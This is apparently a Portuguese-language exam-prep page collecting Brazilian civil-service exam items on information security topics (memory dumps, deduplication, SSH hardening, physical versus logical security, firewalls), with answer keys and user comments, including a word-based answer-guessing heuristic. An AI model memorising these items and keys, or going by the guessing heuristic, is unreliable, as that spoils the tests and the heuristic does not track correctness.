    sem sentido igual esse assunto ta aqui em informática, que eu nem sei qual é!

     

    isso é informática?

  • Olá amiga "persista", sim, isso é matéria de Forense computacional que de fato mais parece Criminalista... hahaha. Foi uma questão da Abin desse ano da prova de Oficial de Inteligência - Área 4.

    Abraços !

     

     

    "Retroceder Nunca Render-se Jamais !"

    Força e Fé !

    Fortuna Audaces Sequitur !

  • A cadeia de custódia tem inicio no momento da apreensão do equipamento alvo da perícia.

  • § 1º O início da cadeia de custódia dá-se com a preservação do local de crime ou com procedimentos policiais ou periciais nos quais seja detectada a existência de vestígio.    

  • Não consegui nem entender o enunciado pra chegar numa conclusão! Na minha opinião, questao mal formulada

  • GABARITO: ERRADO.

  • Agora ferro!!!!! Misturou Processo Penal com informática...... Ajuda ai cespe.......

  • ERRADO

     1º O início da cadeia de custódia dá-se com a preservação do local de crime ou com procedimentos policiais ou periciais nos quais seja detectada a existência de vestígio.  

    No momento em que seja detectado a existência do vestígio, teremos o início da cadeia de custódia, independente do tipo de perícia.

    O "vestígio previamente adquirido" deu início à cadeia de custódia.

    A questão repercute a cadeia de custódia e não deveria ser reclassificado.

  • Gab E.

    Cadeia de custódia:

    Art. 158-A. Considera-se cadeia de custódia o conjunto de todos os procedimentos utilizados para manter e documentar a história cronológica do vestígio coletado em locais ou em vítimas de crimes, para rastrear sua posse e manuseio a partir de seu reconhecimento até o descarte. 

    § 1º O início da cadeia de custódia dá-se com a preservação do local de crime ou com procedimentos policiais ou periciais nos quais seja detectada a existência de vestígio.

    Etapas: RIF CAT RPAD

    Reconhecimento, isolamento, fixação (descrição), coleta, acondicionamento (embalar), transporte, recebimento, processamento (perícia em si), armazenamento (guardar pós perícia), descarte.

  • DEDUPLICAÇÃO é a compactação de dados a fim de diminuir o volume de armazenamento. Acredito que isso torne a questão errada, uma vez que o processo descrito necessita de mais detalhes com relação aos vestígios.

  • Gabarito: Errado

    Art. 158-A, do CPP. Considera-se cadeia de custódia, o conjunto de todos os procedimentos utilizados para manter e documentar a história cronológica dos vestígio coletado em locais ou em vítimas de crimes, para rastrear sua posse e manuseio a partir de seu reconhecimento até o descarte.


ID
2624242
Banca
CESPE / CEBRASPE
Órgão
ABIN
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Com relação à análise de linha do tempo e à aquisição de dados em memória, julgue o seguinte item.


A extração de uma imagem da memória de um sistema, conhecida como dump de memória, permite identificar os processos que estavam em execução no momento da extração, bem como os arquivos, as bibliotecas, chaves de registro ou sockets em uso por cada processo.

Alternativas
Comentários
  • Gabarito Certo

    memory dump ou despejo de memória é uma reprodução de tudo o que está na memória em um determinado momento da execução do programa. Em geral isto é feito em um momento de erro.

    O despejo normalmente trata da reprodução física da memória e é muito importante me linguagens de nível um pouco mais baixo (Assembly, C, C++, etc.) que tem acesso total à memória e pode produzir resultados inesperados.

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • Fazer um dump da memória RAM é como “congelar” o estado da memória e salva-la num arquivo, que nada mais é, que um clone fidedigno da memória RAM, salvando assim todos os dados que estavam alocados na memória no momento do dump.

    Um dump de memória RAM, serve para análise de possíveis malwares alojados na RAM, como também para descobrir o que estava sendo feito naquele dispositivo utilizando os dados voláteis encontrados.

    Todas as informações presentes em memória RAM, por serem voláteis serão perdidas assim que o dispositivo em questão for desligado, e qualquer ação no dispositivo ligado altera o estado da memória, pois estará enviando novos dados a memória, como por exemplo ao executar um programa.

    A volatilidade dar-se pela perda de informação ao ser desligado um dispositivo tecnológico, assim como a capacidade de recuperação ou validação dos dados, diminuindo a veracidade e possivelmente impedindo que tenha algo de valor probatório em juízo.

    Usaremos os softwares FTK Imager para fazer o dump e o Volatility Framewok para análise do dump, o FTK Imager será utilizado no Windows para realizar o dump, o Volatility no Linux para análise

    É possível extrair da memória RAM:

    Processos em execução;

    Sockets de rede;

    Conexões abertas de rede;

    Arquivos e DLLs carregadas para cada processo;

    Registros utilizados para cada processo;

    Módulos de Kernel do Sistema Operacional;

    Mapeamento de endereços físicos e virtuais;

    Mapa de memória de cada processo.

    FONTE: https://www.lucasthyerre.com.br/2018/06/01/o-que-nos-pode-revelar-a-memoria-ram/


ID
2624353
Banca
CESPE / CEBRASPE
Órgão
ABIN
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

O item a seguir apresenta uma situação hipotética seguida de uma assertiva a ser julgada a respeito de identificação de vulnerabilidades por inspeção de código.


Um arquivo de configuração é acessado por uma classe Java que guarda, em um objeto em memória, o acesso ao dataSource do banco de dados do servidor. Quando compilado, esse arquivo é criptografado. Nesse caso, para evitar alteração ou modificação do arquivo por terceiros, uma solução seria guardar o arquivo no repositório GIT, de forma privada.

Alternativas
Comentários
  • Questão mais doida. Até agora entendi a questão. 

  • Tudo perfeito , o GIT tem a opçao de forma privada ,

  • Git é um sistema de controle de versão de arquivos. Através deles podemos desenvolver projetos na qual diversas pessoas podem contribuir simultaneamente no mesmo, editando e criando novos arquivos e permitindo que os mesmos possam existir sem o risco de suas alterações serem sobrescritas.

    dentre suas funcionalidades está o branch (cópia espelho) que você pode trabalhar de forma privada ate termina-lo e então tornar público. 

     

    FONTE:https://tableless.com.br/tudo-que-voce-queria-saber-sobre-git-e-github-mas-tinha-vergonha-de-perguntar/

    Espero ter ajudado ;)

  • GIT pode ser usado para registrar o histórico de edições de qualquer tipo de arquivo. 

  • obrigado Nishimura

  • GABARITO: CERTO.


ID
2626795
Banca
CESPE / CEBRASPE
Órgão
ABIN
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

A respeito de escalabilidade, segurança, balanceamento de carga, fail-over e replicação de estados em sistema gerenciador web, julgue o item subsequente.

O fato de várias ferramentas de snapshots configurarem uma validade para cada cópia e, vencido o prazo, cópia ser apagada e o espaço reutilizado para um novo becape é um problema que pode ser solucionado, em um sistema gerenciador web, por meio da desduplicação na origem, tecnologia que permite guardar apenas os segmentos de dados únicos das VMs em cada snapshot, o que economiza tanto em armazenamento como em I/O de becape e tráfego na rede.

Alternativas
Comentários
  • Gabarito Certo

    Para identificar duplicidades, os dados podem ser analisados em diferentes formas, dependendo da tecnologia utilizada.  Na desduplicação em nível de arquivo, também chamada de armazenamento de instância única (SIS), os arquivos que serão copiados são comparados com arquivos que já foram armazenados. Se o arquivo é único, ele é armazenado e o índice é atualizado; se não, apenas um ponteiro para o arquivo existente é armazenado. O resultado é que apenas uma cópia do arquivo é salva e as cópias subsequentes são substituídas por ponteiros que direcionam ao arquivo original.

    A desduplicação em nível de arquivo é útil em alguns cenários, como em um servidor de arquivos, por exemplo, em que vários usuários eventualmente salvam o mesmo arquivo repetidas vezes em diferentes locais. Nesse caso, a desduplicação em nível de arquivo verifica as redundâncias e salva apenas uma cópia do arquivo com diversos ponteiros apontando para este local.  A desvantagem da desduplicação no nível de arquivo é a sua falta de granularidade e incapacidade de fornecer desduplicação no nível do subarquivo. Isso significa que mesmo a menor mudança em um arquivo, como a mudança do título, por exemplo, fará com que um novo arquivo que seja armazenado.

    A desduplicação de bloco opera no nível do sub-arquivo e pode ser de comprimento fixo ou variável. Como o próprio nome indica, o arquivo é normalmente dividido em segmentos – pedaços ou blocos – que são examinados para redundância em relação a informações armazenadas anteriormente.

     

    A desduplicação de comprimento fixo se vale de um algoritmo que divide um sistema de arquivos em segmentos de dados de mesmo comprimento. A principal limitação dessa abordagem é o fato de que, quando os dados em um arquivo são alterados (por exemplo, quando se adiciona um slide a uma apresentação do Microsoft PowerPoint), todos os blocos subsequentes no arquivo serão regravados e provavelmente serão considerados diferentes com relação ao arquivo original.

    A desduplicação de comprimento variável é uma abordagem mais avançada, que posiciona segmentos de comprimento variável com base em seus padrões de dados internos. Isso soluciona o problema de alteração de dados com relação à abordagem de blocos de comprimento fixo.

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • Tecnicalidades à parte, o enunciado precisa passar por uma série revisão ortográfica e gramatical.

  • A desduplicação na origem é a remoção de redundâncias dos dados no ambiente de produção antes de serem transmitidos para o servidor ou appliance de backup. A desduplicação na origem é feita através de um software que se comunica com o servidor ou appliance de backup para comparar novos blocos de dados com blocos previamente armazenados.  Se o servidor ou appliance tiver armazenado anteriormente algum bloco de dados, ele não será enviado pela rede.

     

    O benefício principal da desduplicação na origem é a redução do uso da rede e, por consequência, maior eficiência no armazenamento. Por outro lado, ao realizar a remoção de redundâncias no ambiente de produção, ela compartilha o processamento utilizado por outras aplicações em funcionamento, o que pode impactar esse ambiente, caso o projeto não seja bem dimensionado.

     

    Fonte: http://www.aliancatecnologia.com/conteudo/2015/05/o-que-e-desduplicacao-e-o-que-sua-empresa-precisa-saber/

     

     

  • (C)

    MÉTODO NISHIMURA:

    1) Quando a questão explica sobre determinado assunto, geralmente, a assertiva é verdadeira;

    2) Quando a questão impõe algo, geralmente, a assertiva é falsa;

    3) Quando a questão compara duas tecnologias, geralmente, a assertiva é falsa;

    4) Quando a questão "fala mal" "menospreza" determinada tecnologia, geralmente a assertiva é falsa;

    5) Quando a questão enumera itens, se todos os itens pertencem ao mesmo grupo/programa, a assertiva é verdadeira;

    6) Se um dos itens, geralmente o último, não faz parte do grupo/programa, a assertiva é falsa;

    7) Estas palavras indicam uma questão certa: pode(m), permite(m), é possível, pode ser...

    8) Estas palavras indicam uma questão errada: automaticamente, deve. deve-se, só, somente, não permite, não sendo possível, sempre, é necessário, necessariamente.

  • Snapshot (FOTO DO SISTEMA): Cria-se uma fotografia do estado dos dados em um momento específico, estabelece um ponto de restauração caso haja falha. Fornece cópias instantâneas dos dados sem consumir muito espaço.

    São ideais para testes de backup ou de desenvolvimento, análise da informação e mineração de dados.

    Desduplicação: processo usado para diminuir a quantidade de dados armazenados. A ideia é fazer com que nunca exista dois ou mais computadores armazenando os mesmos dados. Ganha espaço em disco e diminuição no tempo de backup.


ID
2626798
Banca
CESPE / CEBRASPE
Órgão
ABIN
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

A respeito de escalabilidade, segurança, balanceamento de carga, fail-over e replicação de estados em sistema gerenciador web, julgue o item subsequente.


Em um sistema gerenciador web, a solução de monitoramento de segurança deve ser um processo contínuo de planejamento, implementação, gerenciamento e teste.

Alternativas
Comentários
  • Gabarito Certo

    Perfeita a questão ! Sem dúvidas a solução de monitoramento de segurança deve ser um processo contínuo de planejamento, implementação, gerenciamento e teste em um gerenciador web.

    Vamos na fé !

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • (C)

    MÉTODO NISHIMURA:

    1) Quando a questão explica sobre determinado assunto, geralmente, a assertiva é verdadeira;

    2) Quando a questão impõe algo, geralmente, a assertiva é falsa;

    3) Quando a questão compara duas tecnologias, geralmente, a assertiva é falsa;

    4) Quando a questão "fala mal" "menospreza" determinada tecnologia, geralmente a assertiva é falsa;

    5) Quando a questão enumera itens, se todos os itens pertencem ao mesmo grupo/programa, a assertiva é verdadeira;

    6) Se um dos itens, geralmente o último, não faz parte do grupo/programa, a assertiva é falsa;

    7) Estas palavras indicam uma questão certa: pode(m), permite(m), é possível, pode ser...

    8) Estas palavras indicam uma questão errada: automaticamente, deve. deve-se, só, somente, não permite, não sendo possível, sempre, é necessário, necessariamente.

  • Plan = Entender os requisitos e as necessidades

    Do = Implementar e operar os controles de riscos

    Check = Monitorar o desempenho e identificar não conformidades

    Act (agir) = Promoção da melhora contínua

  • Questão redonda, esquece Nishimura.

ID
2626837
Banca
CESPE / CEBRASPE
Órgão
ABIN
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Julgue o item a seguir, relativo aos ambientes de alta disponibilidade.


Em um ambiente de alta disponibilidade, a confiabilidade é o resultado do levantamento estatístico das horas de funcionamento da infraestrutura elétrica do ambiente.

Alternativas
Comentários
  • Falou em disponibilidade.

  • Gabarito Errado

    Claramente a banca falou em disponibilidade.

     

    Vamos na fé !

     

     

    "Retroceder Nunca Render-se Jamais !"
    Força e Fé !
    Fortuna Audaces Sequitur !

  • Errado.

    Deve-se notar que a questão limitou/restringiu o conceito... "a confiabilidade é o resultado do levantamento estatístico das horas de funcionamento da infraestrutura elétrica do ambiente."

     

    A confiabilidade vai muito além de avaliar APENAS a infraestrutura elétrica... do que adianta eu estar com a energia funcionando 100% se, por exemplo, uma aplicação crítica do negócio da organização vive travando...

     

    Quando se trata de ambiente de alta disponibilidade, leva-se em conta o funcionamento de todos recursos envolvidos e o quesito "confiabilidade" de todos eles.

  • Leiam o comentário de Lucc. O.

    Esqueçam as besteiras dos outros 2... Pelo Amor de Deus!

  • ERRADO

    Em um ambiente de alta disponibilidade, a confiabilidade é o resultado do levantamento estatístico das horas de funcionamento DO SISTEMA.

    A confiabilidade nesse caso é a porcentagem de tempo que o sistema está online, como o Lucc. O disse, vai muito além da estrutura de energia.

  • Gabarito ERRADO.

    Um ambiente de alta disponibilidade é um sistema de informação, um sistema de mecanismos ou de equipamentos que não pode ficar fora do ar. EX: os computadores e sistemas que gerenciam uma UTI ou uma Usina Nuclear.

    Não pode parar!

    A Confiabilidade não se limita ao aspecto estatístico, ela é a resultante da Confidencialidade, Integridade, Disponibilidade e da Autenticidade.São necessários os quatro princípios da Segurança da Informação para se ter a Confiabilidade.

  • Confidencialidade é diferente de disponibilidade. A questão fala de disponibilidade!
  • copiando

    "ambiente de alta disponibilidade" = "um sistema de informação, de mecanismos ou de equipamentos que não pode ficar fora do ar. EX: os computadores e sistemas que gerenciam uma UTI ou uma Usina Nuclear".

    Confiabilidade disponibilidade

  • ERRADO

    Esse é o conceito de DISPONIBILIDADE e não de confiabilidade.

    Ainda, a disponibilidade é do sistema como um todo e não só da infraestrutura elétrica do ambiente. 

  • Infraestrutura confiável não depende só de energia.

ID
2630326
Banca
FAURGS
Órgão
UFRGS
Ano
2015
Provas
Disciplina
Segurança da Informação
Assuntos

Algumas versões do Windows, principalmente as destinadas ao uso em ambientes empresariais e em organizações, oferecem um recurso de proteção que permite cifrar o conteúdo de um disco inteiro, lógico ou físico. Esse recurso evita que, em caso de perda ou roubo de um computador, os dados gravados no disco sejam lidos por terceiros. Como se denomina esse recurso?

Alternativas
Comentários
  • BitLocker é um sistema de Criptografia do Windows, presente em versões do Windows Vista, Windows 7, Windows 8 e no Windows 10. Consiste em codificar partições do HD, protegendo seus documentos e arquivos do computador contra o acesso não autorizado.

  • EFS -> encripta arquivos e diretórios individualmente

    BitLocker -> encripta o disco inteiro


ID
2630383
Banca
FAURGS
Órgão
HCPA
Ano
2014
Provas
Disciplina
Segurança da Informação
Assuntos

Conforme as diretrizes para a implementação do Perímetro de Segurança Física e do Ambiente, é apropriado que:


I - os perímetros de segurança sejam claramente definidos.

II - sejam construídas barreiras físicas, onde aplicável, para impedir o acesso físico não autorizado e a contaminação do ambiente.

III - as instalações de processamento da informação gerenciadas pela organização fiquem fisicamente juntas daquelas que são gerenciadas por terceiros.


Quais estão corretas? 

Alternativas
Comentários
  • III - as instalações de processamento da informação gerenciadas pela organização fiquem fisicamente juntas daquelas que são gerenciadas por terceiros.

     

    9.1.1 Perímetro de segurança física
    g) as instalações de processamento da informação gerenciadas pela organização devem ficar fisicamente separadas daquelas que são gerenciadas por terceiros.
    Fonte: ABNT NBR ISO/IEC 27002:2005


ID
2702584
Banca
FCC
Órgão
SABESP
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Visando aumentar a segurança das informações, um Analista propôs a utilização dos seguintes mecanismos de proteção lógica, gerenciamento de acesso e proteção física:


I. contempla antivírus, filtros de pacotes, controle de acesso wireless, suporte à Virtual Private Network (VPN) e controle de intrusões na rede, chegando a gerar relatórios com diagnóstico de possíveis ameaças lógicas às quais o centro de dados possa estar vulnerável.

II. submete o usuário a mecanismos de autenticação combinados, pertencentes pelo menos às categorias: conhecimento (something you know), possessão (something you have) e herança (something you are).

III. visa fornecer energia para todos os equipamentos, sendo composto por conjuntos de nobreaks, baterias, inversores e retificadores. Os nobreaks redundantes irão assegurar o suprimento contínuo de energia, mesmo em caso de falha de transformadores ou falta de energia elétrica e as baterias são dimensionadas para garantir uma autonomia por um período mínimo de tempo.


Os mecanismos I, II e III se referem, correta e respectivamente, a

Alternativas
Comentários
  • UTM é abreviatura em inglês para Unified Threat Management, que em uma tradução literal para o português seria algo como: Gerenciamento Unificado de Ameaças. Lendo o nome em português você já consegue ter uma noção do que é um Firewall UTM. Nada mais é que um dispositivo de hardware ou um software que une uma série de recursos de segurança em uma única solução. http://infob.com.br/o-que-e-um-firewall-utm/
  • Multi-Factor Authentication MFA ) é um método de confirmar a identidade reivindicada de um usuário em que um usuário de computador obtém acesso somente após apresentar duas ou mais evidências (ou fatores) com êxito a um mecanismo de autenticação : conhecimento (algo que o usuário e apenas o usuário sabe), posse (algo que o usuário e somente o usuário tem), e inerência (algo que o usuário e somente o usuário é). [1] [2]

    Two Factor Authentication (também conhecida como 2FA ) é um tipo ou subconjunto de autenticação multifator. É um método de confirmar as identidades reivindicadas dos usuários usando uma combinação de dois fatores diferentes: 1) algo que eles sabem, 2) algo que eles têm, ou 3) algo que eles são.


    Um bom exemplo de autenticação de dois fatores é a retirada de dinheiro de um caixa eletrônico ; somente a combinação correta de um cartão bancário (algo que o usuário possui) e um PIN (algo que o usuário saiba) permite que a transação seja realizada.

    Outro exemplo de autenticação de dois fatores está sendo freqüentemente usado no gmail.com. Cada novo login pedirá a senha e uma senha única (OTP) gerada pelo sistema, enviada no número de celular registrado ou no ID de e-mail.

  • Letra B para não.assinantes.


ID
2756605
Banca
FAURGS
Órgão
BANRISUL
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Um dos grandes desafios das empresas é evitar o vazamento de dados. Nesse sentido, surgiram softwares e sistemas de prevenção de vazamento de dados, Data Loss Prevention (DLP). Considerando a necessidade de controle das informações da empresa e as soluções de DLP presentes no mercado, assinale a alternativa correta.

Alternativas
Comentários
  • Os recursos do software DLP classificam as informações que são confidenciais e as protegem de forma mais rigorosa, impedindo que os usuários finais acessem e compartilhem, de forma acidental ou maliciosa, os dados que possam colocar a organização em situação de risco e exposição livre na internet.


ID
2774497
Banca
COPEVE-UFAL
Órgão
UFAL
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Dentro de uma instituição de ensino, a gestão dos processos passa por diversas pessoas, conforme o seu departamento ou função. Cada unidade faz parte de uma grande engrenagem, a universidade. Dentro desse contexto, existem diversos ativos envolvidos, tais como pessoas, materiais, pesquisas, equipamentos e informações sensíveis ou estratégicas. Obviamente, cada universidade possui o seu “tesouro” e é mister protegê-lo sob pena de perdê-lo. A segurança dos ativos extrapola o conceito restritivo de patrimônio considerado apenas como bens móveis e imóveis. Considerando o conceito amplo utilizado em segurança, um ativo:

I. é todo e qualquer item que possa ser economicamente considerado, ao qual possa ser associada uma ideia de valor, ainda que minimamente expressivo;
II. é apenas um bem tangível;
III. é apenas um bem intangível.

Dos itens, verifica-se que está(ão) correto(s) apenas

Alternativas
Comentários
  • GABARITO A

     

    Entre os ativos estão os bens tangíveis e os intangíveis

  • Que livro, apostila ou site eu encontro este assunto?

  • Felizmente o ativo é tanto tangível assim como intangível. 

    Livro oficial da ITIL V3


ID
2791756
Banca
CCV-UFC
Órgão
UFC
Ano
2013
Provas
Disciplina
Segurança da Informação
Assuntos

Assinale a alternativa que descreve os mecanismos de configuração de um servidor de SSH (sshd_config) permitindo que o mesmo melhore a segurança.

Alternativas
Comentários
  • Hardening de SSH:

    1) Desativar o login do root: PermitRootLogin no

    2) Permitir somente usuários específicos: AllowUsers username

    3) Utilizar a versão SSH Protocol 2: Protocol 2

    4) Modificar a porta do SSH, que por padrão é a 22, por uma porta com o valor mais alto

    Fonte: https://e-tinet.com/linux/servidor-linux-dicas-seguranca/


ID
2846389
Banca
FCC
Órgão
SEFAZ-SC
Ano
2018
Provas
Disciplina
Segurança da Informação
Assuntos

Considere os seguintes controles da política de segurança estabelecida em uma empresa:


I. Controlar o acesso de pessoas às áreas em que se encontram os servidores computacionais da empresa.

II. Bloquear acesso dos funcionários para sites inseguros da internet.

III. Instalar Firewall para controlar os acessos externos para a rede local da empresa.


Os controles mencionados são, respectivamente, tipificados como de Segurança  

Alternativas
Comentários
  • SEGURANÇA FÍSICA


    A segurança física é feita nas imediações da empresa e leva em consideração a prevenção de danos causados por desastres locais ou ambientais, como terremotos, inundações e incêndios.


    Além disso, ela trata de métodos para evitar o acesso de pessoas não autorizadas a áreas em que se encontram dados e informações críticas da empresa. Uma forma de fazer isso é implantar recursos de identificação de funcionários, como o uso de crachás, senhas e cadastro de digitais



    SEGURANÇA LÓGICA


    Esse tipo de proteção controla o acesso a aplicativos, dados, sistemas operacionais, senhas e arquivos de log por meio de firewalls de hardwares e softwares, criptografia, antivírus e outras aplicações contra hackers e possíveis invasões às fontes internas da empresa.



    Fonte: <a href='https://blogbrasil.westcon.com/qual-a-diferenca-entre-seguranca-fisica-e-seguranca-logica'>https://blogbrasil.westcon.com/qual-a-diferenca-entre-seguranca-fisica-e-seguranca-logica</a>


  • Não confunda o firewall pode ser tanto um hardware (parte física) com um software (parte lógica), mas ambos funcionam como segurança lógica.

  • Fui meio que na lógica essa, algo físico, e algo que vc palpável.

  • Daniel, aqui nas caixinhas de respostas dos alunos, creio eu, que eh um campo para dicas, desabafos, reclamaçoes, duvidas e perguntas, entao para de encher o saco e deixa o povo falar o que quiser aqui, cada um faz o desabafo que quiser aqui.


ID
3044635
Banca
FCC
Órgão
TRF - 4ª REGIÃO
Ano
2019
Provas
Disciplina
Segurança da Informação
Assuntos

Suponha que um Analista do Tribunal Regional Federal da 4ª Região – TRF4 se depare com uma situação em que deve implantar mecanismos de proteção interna voltados à segurança física e lógica das informações no ambiente do Tribunal. Para isso, ele levantou os seguintes requisitos:


I. Não instalar em áreas de acesso público equipamentos que permitam o acesso à rede interna do Tribunal.

II. Os usuários não podem executar transações de TI incompatíveis com sua função.

III. Apenas usuários autorizados devem ter acesso de uso dos sistemas e aplicativos.

IV. Proteger o local de armazenamento das unidades de backup e restringir o acesso a computadores e impressoras que possam conter dados confidenciais.


O Analista classificou correta e respectivamente os requisitos de I a IV como segurança

Alternativas
Comentários
  • Letra (b)

    SEGURANÇA FÍSICA

     

    A segurança física é feita nas imediações da empresa e leva em consideração a prevenção de danos causados por desastres locais ou ambientais, como terremotos, inundações e incêndios.

     

    Além disso, ela trata de métodos para evitar o acesso de pessoas não autorizadas a áreas em que se encontram dados e informações críticas da empresa. Uma forma de fazer isso é implantar recursos de identificação de funcionários, como o uso de crachás, senhas e cadastro de digitais

     

     

    SEGURANÇA LÓGICA

     

    Esse tipo de proteção controla o acesso a aplicativos, dados, sistemas operacionais, senhas e arquivos de log por meio de firewalls de hardwares e softwares, criptografia, antivírus e outras aplicações contra hackers e possíveis invasões às fontes internas da empresa.

  • segurança física tem como objetivo proteger equipamentos e informações contra usuários não autorizados, prevenindo o acesso a esses recursos. Segurança Física deve se basear em perímetros predefinidos nas imediações dos recursos computacionais, podendo ser explícita como uma sala-cofre, ou implícita, como áreas de acesso restrito.

    A segurança física pode ser abordada sob duas formas:

    •Segurança de acesso - trata das medidas de proteção contra o acesso físico não autorizado;

    •Segurança ambiental– trata da prevenção de danos por causas naturais.

    segurança lógica é um processo em que um sujeito ativo deseja acessar um objeto passivo.O sujeito é um usuário ou um processo da rede e o objeto pode ser um arquivo ou outro recurso de rede (estação de trabalho, impressora, etc). A segurança lógica compreende um conjunto de medida e procedimentos, adotados pela empresa ou intrínsecos aos sistemas utilizados.O objetivo é proteger os dados, programas e sistemas contra tentativas de acessos não autorizados ,feitas por usuários ou outros programas.

    O controle de acesso lógico pode ser visualizado de dois modos diferentes: �

    A partir do recurso computacional que se pretende proteger;�

    A partir do usuário a quem se pretende dar privilégios e acesso aos recursos

    fonte: https://www.projetoderedes.com.br/aulas/ugb_auditoria_e_analise/ ugb_apoio_auditoria_e_analise_de_seguranca_aula_02.pdf

  • Oi!

    Gabarito: B

    Bons estudos!

    -O sucesso é a soma de pequenos esforços repetidos dia após dia.


ID
3191095
Banca
COMPERVE
Órgão
UFRN
Ano
2019
Provas
Disciplina
Segurança da Informação
Assuntos

A Segurança Computacional possui uma terminologia própria. Uma padronização na utilização dessa terminologia garante o correto entendimento entre os diferentes agentes envolvidos. Em relação a isso, considere as seguintes afirmações sobre a Segurança Computacional.

I  A segurança física visa providenciar mecanismos para restringir o acesso às áreas críticas da organização a fim de garantir a integridade e autenticidade dos dados.

II Uma ameaça pode ser definida como algum evento que pode ocorrer e acarretar algum perigo a algum ativo da rede. As ameaças podem ser intencionais ou não-intencionais.

III São ameaças mais comuns às redes de computadores: o acesso não-autorizado, o reconhecimento (ex: PortScan) e a negação de serviço (ex: DoS ou DDoS).

IV O “Tripé da Segurança” é formado de Pessoas, Processos e Políticas de Segurança. De nada adianta uma Política de Segurança se Pessoas e Processos não forem considerados. 


Em relação à Segurança Computacional, estão corretas as afirmativas 

Alternativas
Comentários
  • Na alternativa II é a definição de incidente. Cabe recurso.

  • Eu errei, pois na alternativa II entendi que todos os perigos são intencionais.

  • Antes de 2001 a segurança da informação era baseada no tripe:

    1- Confidencialidade

    2- Integridade

    3- Disponiblidade

    Com o passar dos anos, bem além da ISO 17799:2001, foram mais dois itens que agora passam a incorporar os 5 Pilares da Segurança da Informação:

    1- Confidencialidade

    2- Integridade

    3- Disponiblidade

    4- Autenticidade

    5- Irretratabilidade ou nao-refugio.

  • O tripe da segurança é a CID (Confidencialidade, Integridade e Disponibilidade)

    Corretas:

    II Uma ameaça pode ser definida como algum evento que pode ocorrer e acarretar algum perigo a algum ativo( da rede ou qualquer outro ativo valioso). As ameaças podem ser intencionais ou não-intencionais.

    III São ameaças mais comuns às redes de computadores: o acesso não-autorizado, o reconhecimento (ex: PortScan) e a negação de serviço (ex: DoS ou DDoS).

  • A afirmativa II está correta pois exemplo: uma ameaça a uma rede de computadores é o acesso não autorizado. logo é evento que pode ocorrer e acarretar algum perigo a algum ativo da rede. E esse acesso pode ter sido intencional ou não-intencional.

  • Só agregando informação, o item II não se enquadra como Incidente, como mencionado em um dos comentários.

    Incidente (algumas definições tiradas de questões no QC):

    São sintomas que apontam para uma doença mais grave, chamada de problema.

    Interrupção não planejada de um serviço de TI ou uma redução da qualidade de um serviço de TI.

    Acontecimento imprevisto, ou seja, qualquer evento que não faz parte da operação padrão de um serviço.

  • Atenção!!! A II não tem nada a ver com incidente. Segundo[1], "Um incidente é qualquer evento que näo faz parte do funcionamento-padräo de um serviqo de TI e que causa, ou pode causar, uma interrupcao do servico ou uma reducao do seu nivel de desempenho". 

    E segundo esta outra fonte[2], ameaça "é um evento ou atitude indesejável que potencialmente remove, desabilita ou destrói um recurso".

    Repare q, enquanto "incidente" é algo q está ocorrendo ou já ocorreu, ameaça é algo q pode ocorrer(potencialmente).

    Por exemplo, se vc amea**ça dar 1 tunda de pa**u em alguém, repare q a "so**va" ainda não aconteceu. Por outro lado, se vc, de fato, leva 1 tunda de pa**u, tal evento pode ser caracterizado, na sua vida normal, 1 incidente!!

    Vamos ficar atentos, moçada!!!

    Fonte:

    [1] Gerenciamento de serviços de TI na prática: uma abordagem com base na ITIL, Ivan Luizio Magalhães, Walfrido Brito Pinheiro

    [2] https://www.techtem.com.br/seguranca-da-informacao-riscos-vulnerabilidade-e-ameaca/

  • 5h às 21h, conforme a nova lei de Abuso de Autoridade

  • Ameaça - É a causa potencial de um incidente indesejado, que pode resultar em dado para um sistema ou organização

    Incidente - É indicado por um simples ou por uma série de eventos de segurança da informação indesejados ou inesperados, que tenham uma grande probabilidade de comprometer as operações do negócio e ameaçar a segurança da informação.

    Fonte: ISO 27002


ID
3357877
Banca
IF Baiano
Órgão
IF Baiano
Ano
2019
Provas
Disciplina
Segurança da Informação
Assuntos

A respeito dos conceitos que envolvem a segurança da informação, analise as afirmativas a seguir:


I. Os mecanismos de segurança podem ser lógicos ou físicos.

II. A perda de confidencialidade, integridade e disponibilidade são exemplos de eventos que comprometem a segurança da informação.

III. Assinatura Digital, Encriptação e Firewall são exemplos de mecanismos lógicos de segurança.


Assinale

Alternativas
Comentários
  • Além de lógico, firewall é físico...achei incompleta a alternativa.

  • Exatamente, pessoal! O firewall PODE ser físico. A alternativa em nenhum momento falou que o firewall é exclusivamente lógico.

    GAB E

  • Assertiva E

    todas as afirmativas estiverem corretas.

    I. Os mecanismos de segurança podem ser lógicos ou físicos.

    II. A perda de confidencialidade, integridade e disponibilidade são exemplos de eventos que comprometem a segurança da informação.

    III. Assinatura Digital, Encriptação e Firewall são exemplos de mecanismos lógicos de segurança.

  • De bancas amadoras eu não espero nada além de provas mal feitas com questões PAVOROSAS, assim como foi a III, que pode fazer você perder aquele ponto precioso.

    A banca considerou as 3 alternativas como corretas, mas a única ressalva é que o Firewall PODE ser lógico ou físico

  • FIREWALL PODE SER TANTO FÍSICO QUANTO LÓGICO!!

    hardware ou software que isola da Internet a rede interna de uma organização, permitindo o gerenciamento do fluxo de tráfego e dos recursos da rede e o controle - pelo administrador de rede - do acesso ao mundo externo.

    Pode ser instalado tanto como software e hardware

    • Como um software habilitado em cada computador da rede; e
    • Como um hardware Instalado na conexão da rede com a internet.

    Ou seja,

    1) Como hardware normalmente encontra-se em equipamentos de roteamento de redes; e

    2) Como software encontra-se como um dos recursos do próprio sistema operacional

    [...]

    ► CARACTERÍSTICAS:

    • Filtro de conexões;
    • Permite ou bloqueia o tráfego das portas TCP do computador;
    • Protege ou restringe o acesso aos dados armazenados em um PC;
    • Impede a passagem de vírus, worms ou cookies oriundos da internet;
    • Capaz de proteger o computador de ataques de crackers;
    • Consegue bloquear pacotes de requisição de eco ICMP;
    • Capaz de fazer Roteamento.

